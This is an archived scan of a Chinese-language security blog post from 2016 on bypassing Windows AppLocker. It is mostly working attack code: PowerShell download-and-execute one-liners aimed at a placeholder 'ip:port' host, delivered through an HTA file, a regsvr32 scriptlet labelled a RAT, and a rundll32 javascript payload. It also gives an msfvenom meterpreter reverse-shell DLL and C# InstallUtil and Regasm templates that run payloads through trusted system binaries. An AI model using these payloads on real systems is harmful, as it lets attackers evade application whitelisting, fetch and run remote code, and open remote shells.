evi1cg.me Open in urlscan Pro
2606:50c0:8001::153  Public Scan

Submitted URL: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7
Effective URL: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html
Submission: On October 10 via api from BE — Scanned from DE

Form analysis 0 forms found in the DOM

Text Content

Evi1cg's blog

 * 
   首页
 * 
   标签
 * 
   分类
 * 
   归档
 * 
   工具
 * 
   友链
 * 
   搜索




APPLOCKER BYPASS TECHNIQUES

发表于 2016-09-12 | 分类于 奇技淫巧

from:
https://www.youtube.com/watch?v=z04NXAkhI4k


0X00 COMMAND 和 POWERSHELL 没被禁用,脚本被禁用




1、直接使用CMD POWERSHELL执行

Powershell:


复制

1


IEX (New-Object Net.WebClient).DownloadString('http://ip:port/')




Command:


复制

1


powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/')





2、管道

Powershell:


复制

1


Get-Content script.ps1 | iex




Command:


复制

1


cmd.exe /K < payload.bat





3、HTA

payload.hta


复制

1
2
3
4
5
6
7
8
9
10


<HTML> 
<HEAD> 
<script language="VBScript">
    Set objShell = CreateObject("Wscript.Shell")
    objShell.Run "powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/')"
</script>
</HEAD> 
<BODY> 
</BODY> 
</HTML>





4、REGSVR32.EXE



复制

1


regsvr32 /u /n /s /i:payload.sct scrobj.dll


复制

1


regsvr32 /u /n /s /i:http://ip:port/payload.sct scrobj.dll


payload.sct:


复制

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15


<?XML version="1.0"?>
<scriptlet>
<registration 
    progid="ShortJSRAT"
    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- Learn from Casey Smith @subTee -->
	<script language="JScript">
		<![CDATA[
			rat="powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/')";
		new ActiveXObject("WScript.Shell").Run(rat,0,true);
	
		]]>
</script>
</registration>
</scriptlet>





5、RUNDLL32

payload:


复制

1


rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');")





6、DLL/CPL

payload.dll


复制

1


msfvenom -p windows/meterpreter/reverse_tcp -b '\x00\xff' lhost=192.168.127.132 lport=8888 -f dll -o payload.dll




运行:


复制

1


rundll32 shell32.dll,Control_RunDLL payload.dll




将dll重命名为cpl,双击运行。


7、NISHANG 文件BACKDOOR



nishang client

http://drops.wooyun.org/tips/8568


0X01 可执行目录



通过ps脚本扫描可写入的路径

下载地址:http://go.mssec.se/AppLockerBC

扫描可执行路径:



绕过AppLocker执行:




0X02 禁用POWERSHELL以后



配置禁用powershell



禁用以后再次打开powershell




1、通过.NET执行POWERSHELL

通过.Net执行powershell进行绕过:



C# templae
powershell.cs


复制

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15


using System;
using System.Management.Automation;
namespace Powershell
{
	class Program
	{
		static void Main(string[] args)
		{
			PowerShell ps = PowerShell.Create();
			ps.AddCommand("Invoke-Expression");
			ps.AddArgument("payload");
			ps.Invoke();
		}
	}
}




编译exe以后不能直接运行,可以放到可执行目录执行,调用powershell。


2、INSTALLUTIL



参考1:http://drops.wooyun.org/tips/8862

参考2: http://drops.wooyun.org/tips/8701

InstallUtil.cs


复制

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24


using System;
using System.Management.Automation;
namespace Whitelist
{
	class Program
	{
		static void Main(string[] args)
		{
		}
	}
}
[System.ComponentModel.RunInstaller(true)]
    public class Sample : System.Configuration.Install.Installer
    {
        //The Methods can be Uninstall/Install.  Install is transactional, and really unnecessary.
        public override void Uninstall(System.Collections.IDictionary savedState)
        {
        	PowerShell ps = PowerShell.Create();
			ps.AddCommand("Invoke-Expression");
			ps.AddArgument("payload");
			ps.Invoke();			
        }

    }




编译以后用/U参数运行:


复制

1
2


C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  /unsafe /platform:x64 /out:InstallUtil.exe InstallUtil.cs
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /U InstallUtil.exe





3、REGASM & REGSVCS



Regasm.cs


复制

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22


using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
using System.Management.Automation;
namespace regsvcser
{
    
    public class Bypass : ServicedComponent
    {
        public Bypass() { Console.WriteLine("I am a basic COM Object"); }
		
		[ComUnregisterFunction] //This executes if registration fails
		public static void UnRegisterClass ( string key )
		{
			PowerShell ps = PowerShell.Create();
			ps.AddCommand("Invoke-Expression");
			ps.AddArgument("payload");
			ps.Invoke();	
		}
    }

}




使用方式为:


复制

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16


Create Your Strong Name Key -> key.snk

$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
$Content = [System.Convert]::FromBase64String($key)
Set-Content key.snk -Value $Content -Encoding Byte

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:Regasm.dll /keyfile:key.snk Regasm.cs

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe Regasm.dll 
[OR]
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe Regasm.dll 
//Executes UnRegisterClass If you don't have permissions

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U Regasm.dll 
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U Regasm.dll 
//This calls the UnregisterClass Method





4、NISHANG 文件BACKDOOR

虽然powershell被禁用了,但是仍然可执行shellcode。可以使用hta,macro等方式进行。


0X03 提权

提权到管理员权限,即可执行突破AppLocker的限制,执行exe和脚本

------本文结束,感谢阅读------
 * 本文作者: Evi1cg
 * 本文链接: https://evi1cg.github.io/archives/AppLocker_Bypass_Techniques.html
 * 版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!

# bypass # applocker
Shellter Custom payload
Bypassing Applocker with MSBuild.exe


0 comments
Anonymous
Markdown is supportedPreviewLogin with GitHub

Be the first person to leave a comment!


 * 文章目录
 * 站点概览

Evi1cg

此博客主要用来记录自己技术生涯中所学的一些知识,用来分享和备忘。
104 日志
7 分类
54 标签
RSS
GitHub Twitter 微博 E-Mail
 1. 1. 0x00 Command 和 Powershell 没被禁用,脚本被禁用
    1. 1.1. 1、直接使用cmd powershell执行
    2. 1.2. 2、管道
    3. 1.3. 3、hta
    4. 1.4. 4、Regsvr32.exe
    5. 1.5. 5、rundll32
    6. 1.6. 6、dll/cpl
    7. 1.7. 7、nishang 文件backdoor
 2. 2. 0x01 可执行目录
 3. 3. 0x02 禁用powershell以后
    1. 3.1. 1、通过.Net执行powershell
    2. 3.2. 2、InstallUtil
    3. 3.3. 3、Regasm & Regsvcs
    4. 3.4. 4、nishang 文件backdoor
 4. 4. 0x03 提权


© 2015 – 2022 Evi1cg
我已在此等候你 8 年 22 天 17 小时 31 分 24 秒